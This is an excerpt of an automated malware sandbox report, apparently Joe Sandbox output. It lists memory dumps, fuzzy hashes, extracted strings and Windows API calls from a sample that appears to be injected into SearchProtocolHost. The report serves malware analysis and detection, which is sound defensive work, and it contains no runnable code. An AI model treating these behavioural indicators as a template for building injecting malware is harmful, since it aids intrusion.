                                                                                                                                                                                  • Instruction ID: 56750c22203233e06047e41e9ad94ef0e26bce2d60f10665d813e80f9bb84f71
                                                                                                                                                                                  • Opcode Fuzzy Hash: c74a4fa132a45b5802e5695393bcbf915155c3a3052718cd5c5cd2e452b3aeb8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48410BB1D11219AFDB54CF99CC81AEEBBBCEF48710F10415AFA18E7240E7B19650CBA4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fd18ede5e082a928aa382c2c8b8d36fe834c1915f6e1aba8471b77d87df0642e
                                                                                                                                                                                  • Instruction ID: 3c1e8ed9d00e29fb99d4b7a9d07af01691cd2a38cee420c1aee69c21526e097e
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd18ede5e082a928aa382c2c8b8d36fe834c1915f6e1aba8471b77d87df0642e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40312BB5A10248AFDB14DF58D881EEFB7B9EF88300F108219FA19A7240D770A955CBA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ea10cc7dd48840645c9b51909ace7f5257caa59e643b13e69d488f833b700645
                                                                                                                                                                                  • Instruction ID: cdc9605ed5eceb539de5f31216043167d95aa362fc7584a94bc1e964c881ba63
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea10cc7dd48840645c9b51909ace7f5257caa59e643b13e69d488f833b700645
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC211BB5A10349AFDB14DF58C841EEFB7B9EF89300F004519FE19A7240D770A955CBA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 18dd89190c4dd02556f49eeadb09e87657c22edfcc75a06ffbae778af5e7877e
                                                                                                                                                                                  • Instruction ID: 51a9fa5676ebf3b6581fb8d114596d62ffedb33f6f43902df01fd0c94e1cd059
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18dd89190c4dd02556f49eeadb09e87657c22edfcc75a06ffbae778af5e7877e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7411C2B63903197BF730EA598C43FAB736C9B84B50F244014FB09AE2C0D6E5F85146B5
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8977b60b1e4ca3a321a9bf3ce11d33ab56fb9a2aec7fd740b9404135b1466e10
                                                                                                                                                                                  • Instruction ID: 269d2a8fd1ef7ff9b6a64ccec809a37032d32a5c7453a0b3fef725928d6aba1f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8977b60b1e4ca3a321a9bf3ce11d33ab56fb9a2aec7fd740b9404135b1466e10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23117C75610348AFD724EB64CC41FAFB7ADEB85700F008519FA196B240D7B16956CBA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d6b6faa39021ec0f89dec0e82c419390255c2bee2eadf6448f0dc7d14c5aeebe
                                                                                                                                                                                  • Instruction ID: 67cf4abc36c7ff12b25b00548734bd7369bd853c9c1242a5b6e5d928d3e6bee5
                                                                                                                                                                                  • Opcode Fuzzy Hash: d6b6faa39021ec0f89dec0e82c419390255c2bee2eadf6448f0dc7d14c5aeebe
                                                                                                                                                                                  • Instruction Fuzzy Hash: 67115E75610348BFD720EB64CC41FEFB7ADEF85600F004519FA596B241D7B06955CBA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 81740f90857b7eab11b68f6208bd145149435a9f7591167ca45a8c6bc7f8234f
                                                                                                                                                                                  • Instruction ID: e8c6c9f2f5d6030da00d987603f7eb194a03b9038d9d5dd4a0f46f574529f639
                                                                                                                                                                                  • Opcode Fuzzy Hash: 81740f90857b7eab11b68f6208bd145149435a9f7591167ca45a8c6bc7f8234f
                                                                                                                                                                                  • Instruction Fuzzy Hash: E52130B6D11219AF8B00DFA9D9409EFB7F9FF88200F14826AE915E7204E7705A05CFE0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6244e3802422d4aaf5d7ba63a7fa99d18dda593d8c0b8a8e76b7f335fb380647
                                                                                                                                                                                  • Instruction ID: 2af10235819dbf702bc853e51ce2d11583fe7e9688a71ab92cf8433ed05db575
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6244e3802422d4aaf5d7ba63a7fa99d18dda593d8c0b8a8e76b7f335fb380647
                                                                                                                                                                                  • Instruction Fuzzy Hash: 441112B6D1121DAF9B00DFA9DD409EFB7F9FF48200F14466AE915E7200E7705A148BA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  • String ID: !$x$ Z$*S$/K$0$8$8O$8^$;$=$?Q$E $Ew$G,$Ij$Jp$MH$Q$V$VV$Xl$[$kt$m=$q:$t$~"$3$i$n
                                                                                                                                                                                  • API String ID: 0-1445620207
                                                                                                                                                                                  • String ID: $Web$($hm$*661$*7*6$,FF5$-$Et$-$Ra$/$,O$1*4$$173*$173*71/$3*71$4?$P$6$Ik$71/$Ik~m$LPIH$afOm$agok$evm+$fmha$hhe+$j+54$kqgl$oa$C$p+17$thaS$vwmk
                                                                                                                                                                                  • API String ID: 0-2936358857
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                                                                                  • API String ID: 0-685823316
                                                                                                                                                                                  • Opcode ID: c8fd1fb9a4e64db1564b5c3b5367ef21bcdaac9fabebe46c1b527480ccceb446
                                                                                                                                                                                  • Instruction ID: db7ff5b9eb9eac469130c2aa756174f3af2f3279e4ab29a2e2bdba918b6e6592
                                                                                                                                                                                  • Opcode Fuzzy Hash: c8fd1fb9a4e64db1564b5c3b5367ef21bcdaac9fabebe46c1b527480ccceb446
                                                                                                                                                                                  • Instruction Fuzzy Hash: F82193B5D51318AAEF50DF94CC85BEEB7B9AF08700F10815CE608BA180DBB55648CBA4
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: "$,$B$C$F$g$s$~
                                                                                                                                                                                  • API String ID: 0-3965503115
                                                                                                                                                                                  • Opcode ID: b08c9357803aeb160324ae36289c9f7d68e31d4503c7c55c3673b77e22b8bff9
                                                                                                                                                                                  • Instruction ID: 1f7f7514bbc43915a15f3ee33a3b8d85c9daaad1a2d8f807a06bd226a3081c41
                                                                                                                                                                                  • Opcode Fuzzy Hash: b08c9357803aeb160324ae36289c9f7d68e31d4503c7c55c3673b77e22b8bff9
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC11ED10D0C2CED9DB02C7AC84187AEBFB15F22218F0881D9D5A42B282D2BA5759C7B6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 1$6$7$K$s
                                                                                                                                                                                  • API String ID: 0-2374730789
                                                                                                                                                                                  • Opcode ID: 4624dbdbef5bdf89fa1280c96c48648d8880a3c6b4f9db0dd31904201765e4ae
                                                                                                                                                                                  • Instruction ID: 10e2366883ef58cf9d15e0d385e51193edec0c16536420b7b9bb4d03793de592
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4624dbdbef5bdf89fa1280c96c48648d8880a3c6b4f9db0dd31904201765e4ae
                                                                                                                                                                                  • Instruction Fuzzy Hash: E33164B5E20219BFEB10DF94CD41BFEB7B8EF04304F008159E905AB240E7B59A958BE5

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:2.4%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                  Signature Coverage:1.6%
                                                                                                                                                                                  Total number of Nodes:445
                                                                                                                                                                                  Total number of Limit Nodes:72

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: [$ Z$"|$%$(w$)$1$56f3$H$Hm$K$N\$Qj$OR4"|$R4"|$]$a$d$d9$f3$hy$j$lj$m=hy$n$o$q$v$z$}
                                                                                                                                                                                  • API String ID: 0-4081740624
                                                                                                                                                                                  • Opcode ID: 4770cfdd4fe84b6a5c7a66255bcdc31ee2603af34e21e3f0b0db8cd12cbd56df
                                                                                                                                                                                  • Instruction ID: 1d897fed03ae47d20039e9d962680187b5654c3e4f5df1e7678361a4887bffd7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4770cfdd4fe84b6a5c7a66255bcdc31ee2603af34e21e3f0b0db8cd12cbd56df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 16426CB09062298BEB68CF44C894BDDBBB1BF45308F6081DAC54D7B281DBB55AC9CF51
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 0012C938
                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 0012C973
                                                                                                                                                                                  • FindClose.KERNELBASE(?), ref: 0012C97E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                                                  • Opcode ID: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                                                                                                                                                  • Instruction ID: f51e2db056cfcc89c9fe71cf702ca6fc7d97dd96fe1d7ddcad6693566f8f44b0
                                                                                                                                                                                  • Opcode Fuzzy Hash: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2231B471900218BBDB20EF64DC85FEFB77CEF54745F144558BA44A7180EB70AA948BE1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001394A1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                                                                                                                                                  • Instruction ID: 0185bf50a150e9f14100386205d9efe820255d23c30e51b0806a4dc798560085
                                                                                                                                                                                  • Opcode Fuzzy Hash: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                                                                                                                                                  • Instruction Fuzzy Hash: B431B5B5A01248AFCB14DF99D881EDFB7B9EF8C704F108219F919A7340D770A951CBA5
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 001395F9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  • Opcode ID: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                                                                                                                                                  • Instruction ID: ca7f6ca68a974c6ac041d66cc4a71a6911728a647bed279c26abc94f35968310
                                                                                                                                                                                  • Opcode Fuzzy Hash: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                                                                                                                                                  • Instruction Fuzzy Hash: CE31C6B5A00208AFDB14DF99D881EEFB7B9EF88714F108219FD18A7241D770A951CFA5
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00122088,?,0013816F,00000000,00000004,00003000,?,?,?,?,?,0013816F,00122088,10458B0C,00122088,00000000), ref: 001398E8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                                                                                                                                                  • Instruction ID: 581e1027ca25bc650f528938449723fc3b461db869d0ecf337ae9718d3d88079
                                                                                                                                                                                  • Opcode Fuzzy Hash: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9212BB5A00249AFDB14DF98DC81EEFB7B9EF88704F008119FD58A7241D770A951CBA1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DeleteFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4033686569-0
                                                                                                                                                                                  • Opcode ID: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                                                                                                                                                  • Instruction ID: af64f422faece477584c3c8d5af2a87c4d8d21a23b779336d7c3fcb2388f9e78
                                                                                                                                                                                  • Opcode Fuzzy Hash: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                                                                                                                                                  • Instruction Fuzzy Hash: 37119EB1600208BED720EBA5CC02FEBB76CDF94704F008109FA4867281E7717A51CBA2
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001396E4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_110000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction ID: 860d1afdd63dd04b208eca368c6ba3c960d2a07bb01d4206c0320013e77d593b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E08C362102047BC620FAAACC01FEBB76CEFC5B54F01452AFA48A7242D771B90187F1
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: b31f53f3198de38dc7b39486861023f964537ff5e1b22a89f5db51044e53585a
                                                                                                                                                                                  • Instruction ID: 5119832e032e9171ad4fb87f45ff6db9a1735751465c2c07d63108dbe099a003
                                                                                                                                                                                  • Opcode Fuzzy Hash: b31f53f3198de38dc7b39486861023f964537ff5e1b22a89f5db51044e53585a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9090023264580012924071584888546404597E0301B55C072E0564559C8E148A565361
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 5059b6a108641b29a708a0823d7ec354629feb67e7906dae44f48468d8d9d4a3
                                                                                                                                                                                  • Instruction ID: 7712bd51416eafba838479382d4e135af044e9a33736ab3c59eb54b5d8ae1162
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5059b6a108641b29a708a0823d7ec354629feb67e7906dae44f48468d8d9d4a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7790026264150042424071584808406604597E1301395C176A0694565C8A1889559269
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
• Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 99100f395709911747f94c4ae78bd708bc23904ece02c33c286509ce80867451
                                                                                                                                                                                  • Instruction ID: 5132e43d61f4243e76157738946c83ce077cb2d47ba20b40dbcb180d95ef9844
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99100f395709911747f94c4ae78bd708bc23904ece02c33c286509ce80867451
                                                                                                                                                                                  • Instruction Fuzzy Hash: E990023264550402D20071584518706104587D0301F65C472A056456DD8B958A5165A2
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4145755865.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C19000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C1D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  • Associated: 00000007.00000002.4145755865.0000000000C8E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_af0000_SearchProtocolHost.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: fb1784ca728e378cfdb8346d9b89daee8020baa964f0ebf8f838f86ae206fbdb
                                                                                                                                                                                  • Instruction ID: 4ac2ebd4e22dc743eefd00ff37ad0af905ddffea41e51fe527c848104a0c4f2d
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb1784ca728e378cfdb8346d9b89daee8020baa964f0ebf8f838f86ae206fbdb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D90022228545102D250715C44086164045A7E0301F55C072A0954599D895589556221

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 520 121098-12110e call 13b810 call 13c220 call 124820 call 1113f0 call 131e20 531 121130-121135 520->531 532 121110-121121 PostThreadMessageW 520->532 532->531 533 121123-12112d 532->533 533->531
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 0012111D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
